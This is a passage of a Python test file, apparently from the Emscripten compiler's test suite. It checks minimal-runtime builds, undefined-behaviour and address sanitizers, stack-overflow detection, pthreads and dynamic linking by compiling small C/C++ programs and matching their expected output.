# TODO: Support for non-Node.js shells has not yet been added to MINIMAL_RUNTIME
self.banned_js_engines = [config.V8_ENGINE, config.SPIDERMONKEY_ENGINE]
self.emcc_args = args
self.set_setting('MINIMAL_RUNTIME')
self.maybe_closure()
self.do_runf(test_file('small_hello_world.c'), 'hello')
# Test that printf() works in MINIMAL_RUNTIME=1
@parameterized({
'fs': ('FORCE_FILESYSTEM',),
'nofs': ('NO_FILESYSTEM',),
})
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_hello_printf(self, extra_setting):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.set_setting(extra_setting)
# $FS is not fully compatible with MINIMAL_RUNTIME so fails with closure
# compiler. lsan also pulls in $FS
if '-fsanitize=leak' not in self.emcc_args and extra_setting != 'FORCE_FILESYSTEM':
self.maybe_closure()
self.do_runf(test_file('hello_world.c'), 'hello, world!')
# Tests that -s MINIMAL_RUNTIME=1 works well with SAFE_HEAP
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_safe_heap(self):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.set_setting('SAFE_HEAP')
# $FS is not fully compatible with MINIMAL_RUNTIME so fails with closure
# compiler.
# lsan pulls in $FS
if '-fsanitize=leak' not in self.emcc_args:
self.maybe_closure()
self.do_runf(test_file('small_hello_world.c'), 'hello')
# Tests global initializer with -s MINIMAL_RUNTIME=1
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_global_initializer(self):
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.maybe_closure()
self.do_runf(test_file('test_global_initializer.cpp'), 't1 > t0: 1')
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_return_address(self):
self.set_setting('USE_OFFSET_CONVERTER')
self.do_runf(test_file('core/test_return_address.c'), 'passed')
@no_wasm2js('TODO: sanitizers in wasm2js')
@no_asan('-fsanitize-minimal-runtime cannot be used with ASan')
@no_lsan('-fsanitize-minimal-runtime cannot be used with LSan')
def test_ubsan_minimal_too_many_errors(self):
self.emcc_args += ['-fsanitize=undefined', '-fsanitize-minimal-runtime']
if not self.is_wasm():
if self.is_optimizing():
self.skipTest('test can only be run without optimizations on asm.js')
# Need to use `-g` to get proper line numbers in asm.js
self.emcc_args += ['-g']
self.do_runf(test_file('core/test_ubsan_minimal_too_many_errors.c'),
expected_output='ubsan: add-overflow\n' * 20 + 'ubsan: too many errors\n')
@no_wasm2js('TODO: sanitizers in wasm2js')
@no_asan('-fsanitize-minimal-runtime cannot be used with ASan')
@no_lsan('-fsanitize-minimal-runtime cannot be used with LSan')
def test_ubsan_minimal_errors_same_place(self):
self.emcc_args += ['-fsanitize=undefined', '-fsanitize-minimal-runtime']
if not self.is_wasm():
if self.is_optimizing():
self.skipTest('test can only be run without optimizations on asm.js')
# Need to use `-g` to get proper line numbers in asm.js
self.emcc_args += ['-g']
self.do_runf(test_file('core/test_ubsan_minimal_errors_same_place.c'),
expected_output='ubsan: add-overflow\n' * 5)
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_integer': (['-fsanitize=integer'],),
'fsanitize_overflow': (['-fsanitize=signed-integer-overflow'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_overflow(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_overflow.c'),
assert_all=True, expected_output=[
".c:3:5: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'",
".c:7:7: runtime error: signed integer overflow: 2147483647 + 1 cannot be represented in type 'int'",
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_return': (['-fsanitize=return'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_no_return(self, args):
self.emcc_args += ['-Wno-return-type'] + args
self.do_runf(test_file('core/test_ubsan_full_no_return.cpp'),
expected_output='.cpp:1:5: runtime error: execution reached the end of a value-returning function without returning a value', assert_returncode=NON_ZERO)
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_integer': (['-fsanitize=integer'],),
'fsanitize_shift': (['-fsanitize=shift'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_left_shift(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_left_shift.c'),
assert_all=True, expected_output=[
'.c:3:5: runtime error: left shift of negative value -1',
".c:7:5: runtime error: left shift of 16 by 29 places cannot be represented in type 'int'"
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_null': (['-fsanitize=null'],),
'dylink': (['-fsanitize=null', '-sMAIN_MODULE=2'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_null_ref(self, args):
if is_sanitizing(self.emcc_args):
self.skipTest('test is specific to null sanitizer')
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_null_ref.cpp'),
assert_all=True, expected_output=[
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
".cpp:4:13: runtime error: reference binding to null pointer of type 'int'",
".cpp:5:14: runtime error: reference binding to null pointer of type 'int'",
])
@parameterized({
'fsanitize_undefined': (['-fsanitize=undefined'],),
'fsanitize_vptr': (['-fsanitize=vptr'],),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_static_cast(self, args):
self.emcc_args += args
self.do_runf(test_file('core/test_ubsan_full_static_cast.cpp'),
assert_all=True, expected_output=[
".cpp:18:10: runtime error: downcast of address",
"which does not point to an object of type 'R'",
])
@parameterized({
'g': ('-g', [
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
'in main',
]),
'g4': ('-gsource-map', [
".cpp:3:12: runtime error: reference binding to null pointer of type 'int'",
'in main ',
'.cpp:3:8'
]),
})
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_full_stack_trace(self, g_flag, expected_output):
if g_flag == '-gsource-map':
if not self.is_wasm():
self.skipTest('wasm2js has no source map support')
elif self.get_setting('EVAL_CTORS'):
self.skipTest('EVAL_CTORS does not support source maps')
create_file('pre.js', 'Module = {UBSAN_OPTIONS: "print_stacktrace=1"};')
self.emcc_args += ['-fsanitize=null', g_flag, '--pre-js=pre.js']
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(test_file('core/test_ubsan_full_null_ref.cpp'),
assert_all=True, expected_output=expected_output)
@no_wasm2js('TODO: sanitizers in wasm2js')
def test_ubsan_typeinfo_eq(self):
# https://github.com/emscripten-core/emscripten/issues/13330
src = r'''
#include <typeinfo>
#include <stdio.h>
int main() {
int mismatch = typeid(int) != typeid(int);
printf("ok\n");
return mismatch;
}
'''
self.emcc_args.append('-fsanitize=undefined')
self.do_run(src, 'ok\n')
def test_template_class_deduction(self):
self.emcc_args += ['-std=c++17']
self.do_core_test('test_template_class_deduction.cpp')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_memory64('TODO: ASAN in memory64')
@parameterized({
'c': ['test_asan_no_error.c'],
'cpp': ['test_asan_no_error.cpp'],
})
def test_asan_no_error(self, name):
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('core', name), '', assert_returncode=NON_ZERO)
# note: these tests have things like -fno-builtin-memset in order to avoid
# clang optimizing things away. for example, a memset might be optimized into
# stores, and then the stores identified as dead, which leaves nothing for
# asan to test. here we want to test asan itself, so we work around that.
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_memory64('TODO: ASAN in memory64')
@parameterized({
'use_after_free_c': ('test_asan_use_after_free.c', [
'AddressSanitizer: heap-use-after-free on address',
]),
'use_after_free_cpp': ('test_asan_use_after_free.cpp', [
'AddressSanitizer: heap-use-after-free on address',
]),
'use_after_return': ('test_asan_use_after_return.c', [
'AddressSanitizer: stack-use-after-return on address',
], ['-Wno-return-stack-address']),
'static_buffer_overflow': ('test_asan_static_buffer_overflow.c', [
'AddressSanitizer: global-buffer-overflow on address',
], ['-fno-builtin-memset']),
'heap_buffer_overflow_c': ('test_asan_heap_buffer_overflow.c', [
'AddressSanitizer: heap-buffer-overflow on address',
], ['-fno-builtin-memset']),
'heap_buffer_overflow_cpp': ('test_asan_heap_buffer_overflow.cpp', [
'AddressSanitizer: heap-buffer-overflow on address',
], ['-fno-builtin-memset']),
'stack_buffer_overflow': ('test_asan_stack_buffer_overflow.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'stack_buffer_overflow_js': ('test_asan_stack_buffer_overflow_js.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_unround_size': ('test_asan_bitfield_unround_size.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_unround_offset': ('test_asan_bitfield_unround_offset.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'bitfield_round': ('test_asan_bitfield_round.c', [
'AddressSanitizer: stack-buffer-overflow'
], ['-fno-builtin-memset']),
'memset_null': ('test_asan_memset_null.c', [
'AddressSanitizer: null-pointer-dereference on address 0x00000001'
], ['-fno-builtin-memset']),
'memset_freed': ('test_asan_memset_freed.c', [
'AddressSanitizer: heap-use-after-free on address'
], ['-fno-builtin-memset']),
'strcpy': ('test_asan_strcpy.c', [
'AddressSanitizer: heap-buffer-overflow on address'
], ['-fno-builtin-strcpy']),
'memcpy': ('test_asan_memcpy.c', [
'AddressSanitizer: heap-buffer-overflow on address'
], ['-fno-builtin-memcpy']),
'memchr': ('test_asan_memchr.c', [
'AddressSanitizer: global-buffer-overflow on address'
], ['-fno-builtin-memchr']),
'vector': ('test_asan_vector.cpp', [
'AddressSanitizer: container-overflow on address'
]),
})
def test_asan(self, name, expected_output, cflags=None):
if '-Oz' in self.emcc_args:
self.skipTest('-Oz breaks source maps')
if not self.is_wasm():
self.skipTest('wasm2js has no ASan support')
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
if cflags:
self.emcc_args += cflags
self.do_runf(test_file('core', name),
expected_output=expected_output, assert_all=True,
check_for_error=False, assert_returncode=NON_ZERO)
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_js_stack_op(self):
self.emcc_args.append('-fsanitize=address')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('core/test_asan_js_stack_op.c'),
expected_output='Hello, World!')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_api(self):
self.emcc_args.append('-fsanitize=address')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_core_test('test_asan_api.c')
@no_safe_heap('asan does not work with SAFE_HEAP')
@no_wasm2js('TODO: ASAN in wasm2js')
@no_memory64('TODO: ASAN in memory64')
def test_asan_modularized_with_closure(self):
# the bug is that createModule() returns undefined, instead of the
# proper Promise object.
create_file('post.js', 'if (!(createModule() instanceof Promise)) throw "Promise was not returned :(";\n')
self.emcc_args += ['-fsanitize=address', '--extern-post-js=post.js']
self.set_setting('MODULARIZE')
self.set_setting('EXPORT_NAME', 'createModule')
self.set_setting('USE_CLOSURE_COMPILER')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_runf(test_file('hello_world.c'), expected_output='hello, world!')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_safe_heap_user_js(self):
self.set_setting('SAFE_HEAP')
self.do_runf(test_file('core/test_safe_heap_user_js.c'),
expected_output=['Aborted(segmentation fault storing 1 bytes to address 0)'], assert_returncode=NON_ZERO)
def test_safe_stack(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 1024)
if self.is_optimizing():
expected = [r'Aborted\(stack overflow \(Attempt to set SP to 0x[0-9a-fA-F]+, with stack limits \[0x[0-9a-fA-F]+ - 0x[0-9a-fA-F]+\]\)']
else:
expected = [r'Aborted\(stack overflow \(Attempt to set SP to 0x[0-9a-fA-F]+, with stack limits \[0x[0-9a-fA-F]+ - 0x[0-9a-fA-F]+\]\)',
'__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack.c'),
expected_output=expected,
regex=True,
assert_all=True,
assert_returncode=NON_ZERO)
@node_pthreads
def test_safe_stack_pthread(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('USE_PTHREADS')
if self.is_optimizing():
expected = ['Aborted(stack overflow']
else:
expected = ['Aborted(stack overflow', '__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack.c'),
expected_output=expected,
assert_returncode=NON_ZERO, assert_all=True)
def test_safe_stack_alloca(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
if self.is_optimizing():
expected = ['Aborted(stack overflow']
else:
expected = ['Aborted(stack overflow', '__handle_stack_overflow']
self.do_runf(test_file('core/test_safe_stack_alloca.c'),
expected_output=expected,
assert_returncode=NON_ZERO, assert_all=True)
@needs_dylink
def test_safe_stack_dylink(self):
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('TOTAL_STACK', 65536)
self.dylink_test(r'''
#include <stdio.h>
extern void sidey();
int main() {
sidey();
}
''', '''
#include <string.h>
static long accumulator = 0;
int f(int *b) {
// Infinite recursion while recording stack pointer locations
// so that compiler can't eliminate the stack allocs.
accumulator += (long)b;
int a[1024];
return f(a);
}
void sidey() {
f(NULL);
}
''', ['Aborted(stack overflow', '__handle_stack_overflow'], assert_returncode=NON_ZERO, force_c=True)
def test_fpic_static(self):
self.emcc_args.append('-fPIC')
self.do_core_test('test_hello_world.c')
@node_pthreads
def test_pthread_create(self):
self.set_setting('EXIT_RUNTIME')
# test that the node environment can be specified by itself, and that still
# works with pthreads (even though we did not specify 'node,worker')
self.set_setting('ENVIRONMENT', 'node')
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_c11_threads(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREADS_DEBUG')
if not self.has_changed_setting('INITIAL_MEMORY'):
self.set_setting('INITIAL_MEMORY', '64mb')
# test that the node and worker environments can be specified
self.set_setting('ENVIRONMENT', 'node,worker')
self.do_run_in_out_file_test('pthread/test_pthread_c11_threads.c')
@node_pthreads
def test_pthread_cxx_threads(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_cxx_threads.cpp')
@node_pthreads
def test_pthread_busy_wait(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_busy_wait.cpp')
@node_pthreads
def test_pthread_busy_wait_atexit(self):
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('pthread/test_pthread_busy_wait_atexit.cpp')
@node_pthreads
def test_pthread_create_pool(self):
# with a pool, we can synchronously depend on workers being available
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DALLOW_SYNC']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_create_proxy(self):
# with PROXY_TO_PTHREAD, we can synchronously depend on workers being available
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DALLOW_SYNC']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_create_embind_stack_check(self):
# embind should work with stack overflow checks (see #12356)
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('core/pthread/create.cpp')
@node_pthreads
def test_pthread_exceptions(self):
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-fexceptions']
self.do_run_in_out_file_test('core/pthread/exceptions.cpp')
@node_pthreads
def test_pthread_exit_process(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.emcc_args += ['-DEXIT_RUNTIME', '--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_runtime.c', assert_returncode=42)
@node_pthreads
def test_pthread_exit_main(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_main.c')
def test_pthread_exit_main_stub(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/pthread/test_pthread_exit_main.c')
@node_pthreads
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_pthread_offset_converter(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_OFFSET_CONVERTER')
if '-g' in self.emcc_args:
self.emcc_args += ['-DDEBUG']
self.do_runf(test_file('core/test_return_address.c'), 'passed')
@node_pthreads
@no_wasm2js('wasm2js does not support PROXY_TO_PTHREAD (custom section support)')
def test_pthread_offset_converter_modularize(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_OFFSET_CONVERTER')
self.set_setting('MODULARIZE')
create_file('post.js', 'var m = require("./test_return_address.js"); m();')
self.emcc_args += ['--extern-post-js', 'post.js', '-sEXPORT_NAME=foo']
if '-g' in self.emcc_args:
self.emcc_args += ['-DDEBUG']
self.do_runf(test_file('core/test_return_address.c'), 'passed')
def test_emscripten_atomics_stub(self):
self.do_run_in_out_file_test('core/pthread/emscripten_atomics.c')
@no_asan('incompatibility with atomics')
@node_pthreads
def test_emscripten_atomics(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('core/pthread/emscripten_atomics.c')
@no_asan('incompatibility with atomics')
@node_pthreads
def test_emscripten_futexes(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('core/pthread/emscripten_futexes.c')
@node_pthreads
def test_stdio_locking(self):
self.set_setting('PTHREAD_POOL_SIZE', '2')
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('core/test_stdio_locking.c')
@needs_dylink
@node_pthreads
def test_pthread_dylink_basics(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.do_basic_dylink_test()
@needs_dylink
@node_pthreads
def test_pthread_dylink(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 2)
main = test_file('core/pthread/test_pthread_dylink.c')
# test with a long .so name, as a regression test for
# https://github.com/emscripten-core/emscripten/issues/14833
# where we had a bug with long names + TextDecoder + pthreads + dylink
very_long_name = 'very_very_very_very_very_very_very_very_very_long.so'
self.dylink_testf(main, so_name=very_long_name,
need_reverse=False)
@parameterized({
'': (['-sNO_AUTOLOAD_DYLIBS'],),
'autoload': ([],)
})
@needs_dylink
@node_pthreads
def test_pthread_dylink_entry_point(self, args):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 1)
main = test_file('core/pthread/test_pthread_dylink_entry_point.c')
self.dylink_testf(main, need_reverse=False, emcc_args=args)
@needs_dylink
@node_pthreads
def test_pthread_dylink_exceptions(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-fexceptions')
self.dylink_testf(test_file('core/pthread/test_pthread_dylink_exceptions.cpp'))
@needs_dylink
@node_pthreads
def test_pthread_dlopen(self):
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-Wno-experimental')
self.build_dlfcn_lib(test_file('core/pthread/test_pthread_dlopen_side.c'))
self.prep_dlfcn_main()
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('PROXY_TO_PTHREAD')
self.do_runf(test_file('core/pthread/test_pthread_dlopen.c'))
@needs_dylink
@node_pthreads
def test_pthread_dlsym(self):
self.set_setting('USE_PTHREADS')
self.emcc_args.append('-Wno-experimental')
self.build_dlfcn_lib(test_file('core/pthread/test_pthread_dlsym_side.c'))
self.prep_dlfcn_main()
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 2)
self.set_setting('PROXY_TO_PTHREAD')
self.do_runf(test_file('core/pthread/test_pthread_dlsym.c'))
@needs_dylink
@node_pthreads
def test_pthread_dylink_tls(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 1)
main = test_file('core/pthread/test_pthread_dylink_tls.c')
self.dylink_testf(main, need_reverse=False)
@needs_dylink
@node_pthreads
def test_pthread_dylink_longjmp(self):
self.emcc_args.append('-Wno-experimental')
self.set_setting('EXIT_RUNTIME')
self.set_setting('USE_PTHREADS')
self.set_setting('PTHREAD_POOL_SIZE', 1)
main = test_file('core/pthread/test_pthread_dylink_longjmp.c')
self.dylink_testf(main, need_reverse=False)
@needs_dylink
@node_pthreads
def test_Module_dynamicLibraries_pthreads(self):
# test that Module.dynamicLibraries works with pthreads
self.emcc_args += ['-pthread', '-Wno-experimental']
self.emcc_args += ['--extern-pre-js', 'pre.js']
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
# This test is for setting dynamicLibraries at runtime so we don't
# want emscripten loading `liblib.so` automatically (which it would
# do without this setting).
self.set_setting('NO_AUTOLOAD_DYLIBS')
create_file('pre.js', '''
if (!global.Module) {
// This is the initial load (not a worker)
// Define the initial state of Module as we would
// in the html shell file.
// Use var to escape the scope of the if statement
var Module = {
dynamicLibraries: ['liblib.so']
};
}
''')
self.dylink_test(
r'''
#include <stdio.h>
int side();
int main() {
printf("result is %d", side());
return 0;
}
''',
r'''
int side() { return 42; }
''',
'result is 42')
# Tests the emscripten_get_exported_function() API.
def test_emscripten_get_exported_function(self):
# Could also test with -s ALLOW_TABLE_GROWTH=1
self.set_setting('RESERVED_FUNCTION_POINTERS', 2)
self.emcc_args += ['-lexports.js']
self.do_core_test('test_get_exported_function.cpp')
# Tests the emscripten_get_exported_function() API.
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_emscripten_get_exported_function(self):
# Could also test with -s ALLOW_TABLE_GROWTH=1
self.set_setting('RESERVED_FUNCTION_POINTERS', 2)
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.emcc_args += ['-lexports.js']
self.do_core_test('test_get_exported_function.cpp')
# Marked as impure since the WASI reactor modules (modules without main)
# are not yet supported by the wasm engines we test against.
@also_with_standalone_wasm(impure=True)
def test_undefined_main(self):
if self.get_setting('STANDALONE_WASM'):
# In standalone we don't support implicitly building without main. The user has to explicitly
# opt out (see below).
err = self.expect_fail([EMCC, test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('error: undefined symbol: main (referenced by top-level compiled C/C++ code)', err)
self.assertContained('warning: To build in STANDALONE_WASM mode without a main(), use emcc --no-entry', err)
elif not self.get_setting('LLD_REPORT_UNDEFINED') and not self.get_setting('STRICT'):
# Traditionally in emscripten we allow main to be implicitly undefined. This allows programs
# with a main and libraries without a main to be compiled identically.
# However we are trying to move away from that model to a more explicit opt-out model. See:
# https://github.com/emscripten-core/emscripten/issues/9640
self.do_core_test('test_ctors_no_main.cpp')
# Disabling IGNORE_MISSING_MAIN should cause link to fail due to missing main
self.set_setting('IGNORE_MISSING_MAIN', 0)
err = self.expect_fail([EMCC, test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('error: entry symbol not defined (pass --no-entry to suppress): main', err)
# In non-standalone mode, exporting an empty list of functions signals that we don't
# have a main and so should not generate an error.
self.set_setting('EXPORTED_FUNCTIONS', [])
self.do_core_test('test_ctors_no_main.cpp')
self.clear_setting('EXPORTED_FUNCTIONS')
def test_undefined_main_explict(self):
# If we pass --no-entry this test should compile without issue
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
def test_undefined_main_wasm_output(self):
if not can_do_standalone(self):
self.skipTest('standalone mode only')
err = self.expect_fail([EMCC, '-o', 'out.wasm', test_file('core/test_ctors_no_main.cpp')] + self.get_emcc_args())
self.assertContained('undefined symbol: main', err)
def test_export_start(self):
if not can_do_standalone(self):
self.skipTest('standalone mode only')
self.set_setting('STANDALONE_WASM')
self.set_setting('EXPORTED_FUNCTIONS', ['__start'])
self.do_core_test('test_hello_world.c')
# Tests the operation of API found in #include <emscripten/math.h>
def test_emscripten_math(self):
self.do_core_test('test_emscripten_math.c')
# Tests that users can pass custom JS options from command line using
# the -jsDfoo=val syntax:
# See https://github.com/emscripten-core/emscripten/issues/10580.
def test_custom_js_options(self):
self.emcc_args += ['--js-library', test_file('core/test_custom_js_settings.js'), '-jsDCUSTOM_JS_OPTION=1']
self.do_core_test('test_custom_js_settings.c')
self.assertContained('cannot change built-in settings values with a -jsD directive', self.expect_fail([EMCC, '-jsDWASM=0']))
# Tests <emscripten/stack.h> API
@no_asan('stack allocation sizes are no longer predictable')
def test_emscripten_stack(self):
self.set_setting('TOTAL_STACK', 4 * 1024 * 1024)
self.do_core_test('test_stack_get_free.c')
# Tests settings.ABORT_ON_WASM_EXCEPTIONS
@no_memory64('missing "crashing"')
def test_abort_on_exceptions(self):
# Explicitly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.set_setting('ABORT_ON_WASM_EXCEPTIONS')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ccall', 'cwrap'])
self.emcc_args += ['-lembind', '--post-js', test_file('core/test_abort_on_exception_post.js')]
self.do_core_test('test_abort_on_exception.cpp', interleaved_output=False)
@needs_dylink
def test_gl_main_module(self):
self.set_setting('MAIN_MODULE')
self.do_runf(test_file('core/test_gl_get_proc_address.c'))
@needs_dylink
def test_main_module_js_symbol(self):
self.set_setting('MAIN_MODULE', 2)
self.emcc_args += ['--js-library', test_file('core/test_main_module_js_symbol.js')]
self.do_runf(test_file('core/test_main_module_js_symbol.c'))
def test_REVERSE_DEPS(self):
create_file('connect.c', '#include <sys/socket.h>\nint main() { return (int)(long)&connect; }')
self.run_process([EMCC, 'connect.c'])
base_size = os.path.getsize('a.out.wasm')
# 'auto' should work (it's the default)
self.run_process([EMCC, 'connect.c', '-sREVERSE_DEPS=auto'])
# 'all' should work too although it should produce a larger binary
self.run_process([EMCC, 'connect.c', '-sREVERSE_DEPS=all'])
self.assertGreater(os.path.getsize('a.out.wasm'), base_size)
# 'none' should fail to link because the dependency on ntohs was not added.
err = self.expect_fail([EMCC, 'connect.c', '-sREVERSE_DEPS=none'])
self.assertContained('undefined symbol: ntohs', err)
def test_emscripten_async_call(self):
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test(test_file('core/test_emscripten_async_call.c'))
@no_asan('asyncify stack operations confuse asan')
@parameterized({
'': ([],),
'no_dynamic_execution': (['-sDYNAMIC_EXECUTION=0'],)
})
def test_embind_lib_with_asyncify(self, args):
self.uses_es6 = True
self.emcc_args += [
'-lembind',
'-sASYNCIFY',
'-sASYNCIFY_IMPORTS=["sleep_and_return"]',
'--post-js', test_file('core/embind_lib_with_asyncify.test.js'),
]
self.emcc_args += args
self.do_core_test('embind_lib_with_asyncify.cpp')
@no_asan('asyncify stack operations confuse asan')
def test_em_async_js(self):
self.uses_es6 = True
self.set_setting('ASYNCIFY')
self.maybe_closure()
self.do_core_test('test_em_async_js.c')
@require_v8
@no_wasm2js('wasm2js does not support reference types')
def test_externref(self):
self.run_process([EMCC, '-c', test_file('core/test_externref.s'), '-o', 'asm.o'])
self.emcc_args += ['--js-library', test_file('core/test_externref.js')]
self.emcc_args += ['-mreference-types']
self.do_core_test('test_externref.c', libraries=['asm.o'])
def test_syscall_intercept(self):
self.do_core_test('test_syscall_intercept.c')
# Generate tests for everything
def make_run(name, emcc_args, settings=None, env=None, node_args=None):
if env is None:
env = {}
if settings is None:
settings = {}
if settings:
# Until we create a way to specify link-time settings separately from compile-time settings
# we need to pass this flag here to avoid warnings from compile-only commands.
emcc_args.append('-Wno-unused-command-line-argument')
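# dynamically create a TestCoreBase subclass for this mode; the setUp/tearDown
# defined below apply (and later undo) the mode-specific emcc args, settings,
# environment variables and node args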
TT = type(name, (TestCoreBase,), dict(run_name=name, env=env, __module__=__name__)) # noqa
def tearDown(self):
try:
super(TT, self).tearDown()
finally:
for k, v in self.env.items():
del os.environ[k]
if node_args:
self.node_args = TT.original
TT.tearDown = tearDown
def setUp(self):
super(TT, self).setUp()
for k, v in self.env.items():
assert k not in os.environ, k + ' should not be in environment'
os.environ[k] = v
